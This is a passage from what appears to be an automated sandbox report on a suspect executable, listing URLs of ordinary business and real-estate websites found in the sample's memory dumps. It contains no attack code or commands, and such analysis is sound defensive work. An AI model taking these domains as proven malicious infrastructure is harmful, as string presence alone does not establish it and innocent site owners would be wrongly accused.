                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/~w
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/k
                  Source: PIyT9A3jfC.exe, 00000001.00000002.891834225.00000000059BD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/MH
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/a
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/#
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007769000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/js3
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/s
                  Source: PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/6
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/N
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/Qs8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/Ro
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/Ys0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/bq
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/ra4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/rq8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/yo
                  Source: PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.643743042.000000000771B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/&v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.643743042.000000000771B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/;v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.893998897.0000000007680000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/.0
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/.0)v
                  Source: PIyT9A3jfC.exe, 00000001.00000002.893998897.0000000007680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/53321935-2125563209-4053062332-1002TW
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/No
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rsag.info
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/is
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sgepri.sgcc.com.cn/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/0H
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/C
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/hH
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/9sP
                  Source: PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/ash
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/0v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754767578.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.754767578.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/b
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/VHN
                  Source: PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/j
                  Source: PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/m/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/m/hH
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/v1.0TH8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tnbio.org
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/Ro
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/51
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/;H
                  Source: PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/51
                  Source: PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/O
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/e
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.893998897.0000000007680000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/w_
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#breadcrumb
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#webpage
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#website
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/177-appartement-a-vendre-sigean-30378
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/180-maison-a-vendre-milly-la-foret-41465
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/182-maison-a-vendre-royan-41301
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/184-appartement-a-vendre-valras-plage-41841
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/187-maison-a-vendre-bourg-saint-maurice-41586
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/189-appartement-a-vendre-ajaccio-41880
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/192-loffre-immobiliere-a-nogent-le-rotrou
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/195-coup-doeil-sur-le-marche-immobilier-a-chalon-sur-saone
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/200-acheter-un-bien-a-plusieurs-a-briancon
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/203-achat-appartement-nice-reussir-son-investissement-locatif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/?s=
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/S
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/achat-par-ville
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/astuces
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/comments/feed
